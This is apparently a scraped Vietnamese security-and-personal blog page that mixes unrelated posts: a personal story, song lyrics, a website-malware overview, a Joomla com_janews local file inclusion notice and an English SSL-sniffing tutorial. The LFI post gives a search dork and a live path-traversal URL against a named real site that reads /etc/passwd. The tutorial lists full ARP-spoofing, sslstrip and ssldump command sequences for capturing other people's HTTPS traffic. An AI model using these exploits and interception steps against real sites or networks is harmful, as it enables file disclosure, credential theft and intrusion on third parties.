Biết nói làm sao ?

Tháng Tư 30, 2010 1 Bình luận

Tôi vừa bước vào nhà, chưa kịp đóng cửa, thì bất thình lình một em gái trẻ, trên tay ẫm một đứa bé khoảng vài tháng tuổi, vừa nói vừa hỏi gì đó, rồi đột nhiên bước thẳng vào nhà tôi.

bệnh nghề nghiệp khiến tôi nghi ngờ mọi thứ, nên khỏi phải nói là lúc đó tôi hoang mang đến cỡ nào, khi tự dưng một người lạ cố tình bắt chuyện, và không cần tôi đồng ý, đã xông thẳng vào nhà tôi. mà khu tôi ở nổi tiếng là có nhiều thành phần bất hảo nữa chứ.

không cần tôi hỏi, em gái tự giới thiệu luôn. hóa ra đây là hàng xóm của tôi, ở phía đối diện với khu nhà mà tôi đang thuê. tôi dọn về đây cũng 3 tháng rồi, nhưng ngoại trừ hai ông bà già nhà bên cạnh ra, thì tôi chẳng biết ai cả. cứ đi làm về là tôi chui thẳng vào nhà, khóa cửa, ở lỳ trong đó cho đến khi cần phải ra ngoài.

anh thuê nhà này của chị Tuyết hả? bao nhiêu một tháng vậy anh? trời sao tự dưng chưa gì đã hỏi một câu hỏi liên quan đến tiền, mà lại là câu hỏi mà tôi ghét nhất nữa chứ. tôi không thích nói chuyện về tiền bạc với người lạ. nên tôi nói dối.

àh khoảng 4 triệu một tháng.

trời 4 triệu một tháng lận hả? sao nhiều tiền quá vậy. em nghe nói là chị Tuyết còn bắt phải đóng thế chân 1 tháng phải hông anh? em gái vừa hỏi vừa đảo mắt nhìn khắp nhà.

àh không, phải thế chân 3 tháng.

nhà bự vậy mà anh ở một mình hả? trời lại thêm một câu hỏi mà tôi rất ghét. tôi không muốn người lạ biết tôi ở một mình. nên tôi lại nói dối.

àh không, còn có vài đứa em. tôi nhấn mạnh chữ vài đứa em. cô gái lại đảo mắt nhìn khắp nhà tôi thêm một lần nữa. tôi tranh thủ liếc mắt nhìn kỹ kẻ lạ mặt khả nghi.

chà, trông có duyên ghê luôn. àh không phải nói là đẹp. kiểu đẹp của con gái mới lớn, trông rất hồn nhiên xinh tươi. hmm, thì đúng rồi, phải đẹp mới lừa được mấy thằng mê gái như mình. thành ra càng đẹp càng phải cẩn thận.

em nói với anh chuyện này anh đừng nói ai nghe nha. trời ơi, tự dưng hắn lại đổi sang giọng nghiêm trọng nghe ghê quá. thôi rồi, chắc là chuẩn bị tung chiêu đây mà. căng thẳng quá T_T.

chồng em làm hồ, mấy bữa nay Tết, không có việc làm, phải nghỉ ở nhà. mà khổ nỗi, con em thì nó không thể nghỉ uống sữa bữa nào. hồi chiều ổng kêu thôi để ổng đi lên chỗ ông thầu, mượn ba trăm về mua sữa, mà ổng đi từ chiều đến giờ chưa về nữa. con nhỏ nó đói nó khóc quá trời. anh cho em mượn một trăm rưỡi được không anh? khi nào có tiền em sẽ trả anh liền.

tôi liếc nhanh nhìn đứa bé. một bé gái, chắc khoảng vài tháng tuổi (sau đó tôi mới biết là đã hơn 1 tuổi), nhưng mà sao nó xanh xao ốm yếu quá. trời ơi. tôi gần như bất động trong vài giây. bao nhiêu nghi ngờ biến mất, chỉ còn lại ngay trước mắt tôi, một đứa bé đói đến lả người vì ba má nó không có một trăm rưỡi. một trăm rưỡi!!!

anh an tâm đi. hồi nãy ông thầu có gọi điện cho em, ổng kêu đã cho chồng em mượn tiền rồi, nhưng ổng bắt chồng em phải ở lại nhậu với ổng. nên chắc trễ lắm là sáng mai chồng em sẽ đem tiền về. em sẽ đem qua trả lại cho anh liền. em vừa nói vừa nhìn tôi thăm dò. chắc là do thấy tôi giống như đang lưỡng lự. mà thiệt ra, tôi nào có lưỡng lự gì đâu, mà chỉ thấy buồn vui lẫn lộn.

người phụ nữ nhỏ bé này chắc hẳn sẽ sẵn sàng làm mọi thứ để có tiền mua sữa cho con. tôi dám cam đoan là như thế. nếu không em ấy đã chẳng dám đi thẳng vào nhà người lạ, xã giao vài câu rồi hỏi mượn tiền ngay. thiệt là dũng cảm.

có thể tôi đã bị lừa, nhưng tôi nghĩ ở đời có nhiều thứ chúng ta nên tin và phải tin, bất kể là thật giả đúng sai, bởi vì chúng đáng được tin. đó là con người về bản chất là tốt. đó là tình mẫu tử là thứ tình cảm mạnh mẽ nhất trên đời…

niềm tin sẽ tạo thành niềm vui. ờ, còn gì vui hơn đầu năm mà đã chứng kiến tình cảm mẹ con dạt dào mạnh mẽ thế này. nhưng rồi lại thấy buồn rười rượi. buồn cho người mẹ trẻ, hồng nhan bạc phận. buồn cho đứa bé, hôm nay có tiền mua sữa, rồi ngày mai ngày kia sẽ ra sao? rồi lớn lên sẽ lại bạc phận hồng nhan…

[ Duong Ngoc Thai ]

Ra đời website http://vietmatrix.net

Tháng Tư 8, 2010 5 comments

Chào các bạn , được sự giúp đỡ của anh Alex và ủng hộ của các anh chị bên blogs Viet Matrix Revolutions , nay ban quản trị website http://vietmatrix.net cho hoạt động diễn đàn về security , cntt

Mong các bạn ủng hộ

Chuyên mục:Blogs thành viên

Người Đàn Bà Đi Nhặt Mặt Trời – Thiên Kim

Người Đàn Bà Đi Nhặt Mặt Trời
Đức Tiến

Người đàn bà đi nhặt mặt trời
Trên đống bỏ hoang của loài người
Màn đêm che lối
Tưởng rằng nắng tươi
Sương đọng trên lá
Ngỡ giọt nắng rơi
Quên hết vì đâu
Đời mình nên tội

Người đàn bà đi nhặt cuộc tình
Không nhớ người quen bỏ mặc mình
Tuổi xanh khát nắng
Giữa đời cháy da
Đưa mặt lên khóc
Thương tình xót xa
Hay khóc người xưa
Lệ nào cho vươn

Người đàn bà đi nhặt đời mình
Trên đống bỏ hoang đầy tội tình
Cỏ cây như đưa
Mơ hồ biết đâu
Con đường đêm vắng
Côn trùng ruỗi nhau
Chia chát niềm đau
Đời người phai mau

Người đàn bà đi nhặt mặt trời
Hong ấm tình yêu của loài người
Buồn thương nơi ấy
Có người hóa điên
Quen mùi chăn gối
Nhưng chẳng nhớ tên
Trên đống bỏ hoang mà lầm thiên đàng
Trên đống bỏ hoang mà lầm thiên đàng


Site bị chèn virus – Malware – Iframe . . . (Phần 1)

Hi các bạn hiện nay có rất nhiều site trên internet bị chèn iframe , malware , javascript . . . có nhiều nguyên nhân dẫn đến hiện tượng này  , nguyên nhân và hướng khác phục tôi sẽ trình bàyở phần 2 .

Các loại virus thường gặp như:

P2P-Worm.Win32.Franvir

Lemena.3544

Kot.b

EICAR-Test-File

Virus.Boot-DOS.V.1526

Macro.Viso.Radiant

Virus.BAT.8Fish

Trojan-Clicker.Win32.small.k

Trojan-Spy.HTML.Bankfraud

. . . .

Hiện tượng khi truy cập internet ở client (nhiễm các loại trên )

Attack from: 59.64.27.21 port: 9536

Attacked port: 1

Threat: Email-Worm.JS.Gigger

Tương tự cho các loại khác

Một số loại vào sửa file hệ thống , chèn iframe , malware vào code website . . .

Ở bài này tôi chỉ xin giới thiệu sơ lượt như vậy .

Cách khắc phục và phân tích sẽ có ở các bài tiếp theo

[ Mình chuyển qua sài linux rồi ;)) ]

Click view images

Ghi rõ nguồn Viet Matrix Revolutions khi phát hành lại thông tin này

By: AlexBTP

Con Tim Giá Băng – Triệu Hoàng

Lâu lắm rồi mới có bài hát music và vũ đạo có thể chấp nhận được như thế này


Joomla Component com_janews

####################################################################

.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]

.:. Team : Sec Attack Team

.:. Script : Joomla Component com_janews

.:. Bug Type : Local File Inclusion [LFI]

.:. Dork : inurl:"com_janews"

####################################################################

===[ Exploit ]===

####################################################################

Hiện có rất nhiều web ở Việt Nam dùng com này

Demo:

http://www.cynosura.org/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00

Đáng chú ý hơn nữa web www.smot.gov.vn đã bị chèn virus các bạn không nên vào


Admin các web có dùng com này nên update sửa lỗi

Chúng tôi không chịu trách nhiệm về các site đăng trên đầy và lỗi của com này


AlexBTP – Viet Matrix Revolutions


SSL Sniffing

SSL sniffing


E-mail: okan[at]deu.edu.tr
http://www.knyksl.com/
Basic Information


What is SSL?


SSL (Secure Socket Layer) protocol was firstly developed in the year
of 1994 with the aim of providing safe data transferring, by Netscape.
In 1996, in concur with being invented its 3.0 version, it turned out to
be a standard that all internet browsers (Microsoft Explorer, Netscape,
Navigator, etc.) identify. With the help of SSL, it was aimed that the
datas delivered by using HTTPS technology between Web Server and
Web Browser would protect against attackers. The transmission status
with the web sites running under the SSL security is represented with
the golden-colored lock in browsers. The identification process
between Server and Client is provided with a crypto system based on a
public-private key encryption.


What is the need for SSL?


Together with the internet that has become a must-have in today’s
world, the safety of the data on the line has also come into an
immensely importance. The confidance of the institutional or personal
private datas on the line is highly critical and vulnerable. It is
necessary to deliver the data accurately to the other side and not to be
followed by the others during the data transferring process. With the
aim of meeting these needs Secure Sockets Layer was developed.
Signed Certificates
For the web projects in which the safety is more important, the
certificates signed digitally are used. The certificate is actually a file
including some information about the set up. At the same time, it also
includes the public key of the public-private key couple of the
installation. The server certificate includes the information about the
corporation operating that server. The certificates are given out by the
corporations which have the authority for signed certificates
(Globalsign, thawte, etc.). It is connected to the web sites under the
SSL security with the https request. The server sends to the Client the
public key information. Client asks the corporation which signes the
certification the validity of the key. If it is valid, it approves to the
browser that it is connected to a secure web site. Server can see the
information which is encoded by the public key only with the private
key which is available in itself.
Attack Types and Tools
In the committed tests, Backtrack 3.0 Linux was used. In this
document, it was dealed with two attack types with the intention of
accessing the datas in the SSL traffic. Both were formed using the
technique known as MiTM (man in the middle).
Sniffing with MiTM is an effective attack type for the switched
networks. With ARP reply packets, the target ARP table is poisoned.
So attacker seizes an analysis chance for the target data.
Tools
✔ Backtrack 3.0 Live CD

http://www.remoteexploit.org/backtrack.html


✔ Arpspoof (MiTM)
✔ Sslstrip http://www.thoughtcrime.org/software/sslstrip/
✔ Webmitm
✔ Ssldump
✔ Iptables


The attacker who penetrates between server and client with the first
technique attains the data using ssldump software with the insecure
certificate that he approves himself.


# echo 1 > /proc/sys/net/ipv4/ip_forward
# iptables -t nat -A PREROUTING -p tcp –dport 443 -j REDIRECT
# iptables -A FORWARD -j ACCEPT
# arpspoof -t <target> <gateway>
# webmitm -d
#./ssldump -n -d -k webmitm.crt | tee ssldump.log


In the second technique, the attacker who penetrates between server
and client, in brief, attains the data organizing https connection as to
run with the http technique. Sslstrip software is programmed with
Python programming language. Sslstrip default port number is 10000.
It runs similarly with Transparent Proxy logic.


# echo 1 > /proc/sys/net/ipv4/ip_forward
# arpspoof -i eth0 -t 192.168.1.6 192.168.1.1
# iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j
REDIRECT –to-ports 10000
# ./sslstrip –w gelenveri


Links


http://www.blackhat.com/presentations/bh-dc-
09/Marlinspike/BlackHat-DC-09-Marlinspike-Defeating-SSL.pdf


http://forums.remote-exploit.org/tutorials-guides/3157-ssl-sniffingusing-
ssldump-webmitm-arpspoof.html